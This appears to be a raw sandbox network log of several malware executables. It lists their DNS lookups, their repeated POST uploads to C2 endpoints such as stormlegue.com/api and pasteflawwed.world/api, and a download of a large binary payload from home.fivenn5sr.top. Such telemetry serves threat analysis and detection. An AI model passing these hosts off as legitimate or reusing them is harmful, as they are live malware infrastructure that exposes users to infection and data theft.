                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67caebab3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45664&min_rtt=41600&rtt_var=10621&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8841&recv_bytes=1053&delivery_rate=195425&cwnd=257&unsent_bytes=0&cid=505af960bab2a61e&ts=438&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=304XU9ZW
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1566
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=bhiib88h9rtn1vc3on83ap273c; expires=Fri, 21 Feb 2025 00:33:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XdXQ2ilHTj4XUMe8kPqMFfHE71GZii9ZTGiv4eSiX3uxDYhMfeFTEQqu50TfUgw5dXg7vdTrz%2BJoDJsPmDVsO5kGj6HCxmPDwJY54nlSGRJRRoW3yLT8v1tIPhFmulMNAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67cd6dde3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45149&min_rtt=41480&rtt_var=8996&sent=16&recv=16&lost=0&retrans=0&sent_bytes=10023&recv_bytes=3035&delivery_rate=195425&cwnd=257&unsent_bytes=0&cid=505af960bab2a61e&ts=744&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              GET /DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607 HTTP/1.1
                                                                                              Host: home.fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx/1.22.1
                                                                                              date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              content-type: application/octet-stream
                                                                                              content-length: 10816560
                                                                                              content-disposition: attachment; filename="70291GAPXrceoaFFrkeo;"
                                                                                              last-modified: Wed, 19 Feb 2025 09:40:06 GMT
                                                                                              cache-control: no-cache
                                                                                              etag: "1739958006.1613824-10816560-3418429626"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=E8XG5QMOIB
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1055
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=g56ecfq0ur6bo6lng5vj538ka3; expires=Fri, 21 Feb 2025 00:33:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8a2yCl4ok4TxDfQCX7PBjgQd2eDWX9eZIKbcwkiN9fJ8z6KFvA2nXI%2BjmApVitwltcnFlEH5PxPtZEqmnaTYXQJN4ZegkaHTT1miesJhsaH5dBhSPOExC3WTwE0dl1FmjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67cfbf71c140-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42322&min_rtt=41958&rtt_var=9424&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=1747&delivery_rate=93074&cwnd=253&unsent_bytes=0&cid=6a92e9f7d16c8b8a&ts=314&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 77
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=emr99vmgbnqe5j15b3fioms053; expires=Fri, 21 Feb 2025 00:33:30 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txj58nIVSts4ALlIaqx%2FJoTjY3Bcjq%2FeWPX%2Fm5dsLZun4xTlV0%2BZkDRUuWzqXR6p%2Bhw0avYAH%2BOF%2FH6T3TEn7Ksd6IHfpI87S87S8HoyuJjrwN30QA%2B1nvu9iPLieN%2Fj%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67d23aab3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=41567&min_rtt=41293&rtt_var=9132&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=760&delivery_rate=94919&cwnd=253&unsent_bytes=0&cid=df67c6a563dffbe2&ts=283&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              impactsupport.world
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              impactsupport.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nestlecompany.world
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nestlecompany.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uA2%2Bv8V%2FFMMrO0ry7YZ5zAga3N%2Bk0nyu4MBfP8QCmpNMmIk9vMNJBff%2FEERJ2xXXBksg6xrcb4DwNe4HhAB4QrSQF00gX2voBsk4t5FexsSEV8l5%2BiJHpz2nXr3l1pcLpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67de89ab7717-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 43
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=1kphb8i98dd595ne9q209s0knv; expires=Fri, 21 Feb 2025 00:33:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H1dBXkeXcBlos4BgZB0xYyzm2tHGbCahepHwoTsgqMKdSylvChVPTMkAQXUEcJXTIlO7Df4An4UQetWWtq6TacyCypVug59t5dp7EaPyOqZOrXZHbpN8GJAhUwcE%2Fzzh0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67ded9de7717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42564&min_rtt=41679&rtt_var=4514&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8838&recv_bytes=1053&delivery_rate=189852&cwnd=257&unsent_bytes=0&cid=01791c6ffa997ba8&ts=373&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=COHK5MYA0F2GF
                                                                                              Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1582
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=vuohkh28lg54q9sm1ip9nq7n5k; expires=Fri, 21 Feb 2025 00:33:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EcGIO7sDAado64yPuJ%2BqdC9dgGA3ukJbdsbIFvE5cw1CJDoAVGPgqPTqGK1HD9UfG89pg7eedvxF901h5x1%2B3Yi11d8mgKDqm32kWGmH4XULxB7a5bnYoPgqKZUerkZX6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67e11b647717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42483&min_rtt=41679&rtt_var=3548&sent=17&recv=16&lost=0&retrans=0&sent_bytes=10005&recv_bytes=3056&delivery_rate=189852&cwnd=257&unsent_bytes=0&cid=01791c6ffa997ba8&ts=629&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=31TW4FYQEUGRBWZ0V6O
                                                                                              Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1108
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=ri714fbdhki49h0536mfdehn5q; expires=Fri, 21 Feb 2025 00:33:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iYow7MJnu7cyhJ00Z3sHvPjzLmP0b8NVv72gKNNLHP%2F0HhyZVuiAHIwvY1MDFzM6HZ%2FfSFGokklVt63M71nsmkPYo%2Bu8hE%2BkalO7jnsiWbMn43Y1mUf4%2Fmo9lJvx%2BsWPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67e35a203d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=41845&min_rtt=41423&rtt_var=9371&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=1809&delivery_rate=94391&cwnd=253&unsent_bytes=0&cid=93386e466d677fd9&ts=277&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 77
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=58p4v78mhgq1s9jvmnh3g66ui8; expires=Fri, 21 Feb 2025 00:33:33 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSKZtk2iNL17Lfut4gcQ6wyu4mGNw%2BrZ%2BWwmVOLbnOxHXFSRFQK%2F8CXHM58pPxZf0flWW92j9dmK9oxRyfjaa%2FRO5mjB8A6rvzmUxC7GEySmjAv%2BymSn8nIyngI6L1XcSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67e5aef70339-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42700&min_rtt=41934&rtt_var=9986&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=760&delivery_rate=93884&cwnd=253&unsent_bytes=0&cid=2f8b9493763dade3&ts=225&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              pasteflawwed.world
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              pasteflawwed.world
                                                                                              IN A
                                                                                              Response
                                                                                              pasteflawwed.world
                                                                                              IN A
                                                                                              104.21.86.17
                                                                                              pasteflawwed.world
                                                                                              IN A
                                                                                              172.67.214.11
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              f3Ypd8O.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wFFqiD6jyLROHIaF%2FtwSlobpJK4Rj9HbKugFyu%2FE2EHJlMWVWauQClJaZwz5v6Q6EqwVMuDs74qO9qrOuAjkP6XzMTwgYCbNT3mT0YlsKX008hxHhjhz%2Fhw1aqVrmowHNtnScxI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67f00b4155ea-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              f3Ypd8O.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 53
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=iiq9usq93p74ifkta8glsa6qor; expires=Fri, 21 Feb 2025 00:33:34 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VElU6hL0znFqd%2BqP%2BVVEv3uNWEzcOTVZropRpKFx6GlyGIa6jlNebT1nvEN4kwqCxvXSr0lecSG9NLG7AK%2BxF6hRjPuR4nS%2FX0BFhJb9vaXJDTxAwpbRfAtXESRIpNL29Y1DZYc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67f07b7f55ea-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44786&min_rtt=42340&rtt_var=5380&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8572&recv_bytes=1075&delivery_rate=209155&cwnd=247&unsent_bytes=0&cid=c01a589d033ef9c2&ts=366&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              f3Ypd8O.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=UWTM792M
                                                                                              Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1569
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=le3l7t0badbv807cs76mcfg6ub; expires=Fri, 21 Feb 2025 00:33:35 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g9owDSgqeoZFAQW7JdvqKblYOPHVmLiSZW%2B0dnSRrf2xlGLHZNqPRE488BqJVqpQWs0eXMTp9fLmiDmUrh1tSNmi8puwh2vHDcS8ixzz3RGxDjxmrQmu1PCDEsGfXt6N6uWm4yk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67f22c9755ea-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44500&min_rtt=42340&rtt_var=4607&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9747&recv_bytes=3064&delivery_rate=209155&cwnd=247&unsent_bytes=0&cid=c01a589d033ef9c2&ts=591&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              f3Ypd8O.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=NQH6CI0JVP5FLHS
                                                                                              Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1101
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=tbqickl1d1j81egqn0v19mbm6p; expires=Fri, 21 Feb 2025 00:33:35 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nk1DoFqAR9hnEYK7g0kf%2BxHUcwPNvQ62YssSsuYwkCvVsCPhsUhBSD8%2FW52as7AnPPyAGfPCOCcV0g5gZfCJCw3BoFN%2Bx7lkzQVd3Xxzd63PNEAdunLOI%2Bt4eH3ApJBipvQ%2Fa9Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67f46df455ea-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42422&min_rtt=41688&rtt_var=9813&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=1806&delivery_rate=89439&cwnd=243&unsent_bytes=0&cid=0805cbb10e724aed&ts=268&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              f3Ypd8O.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
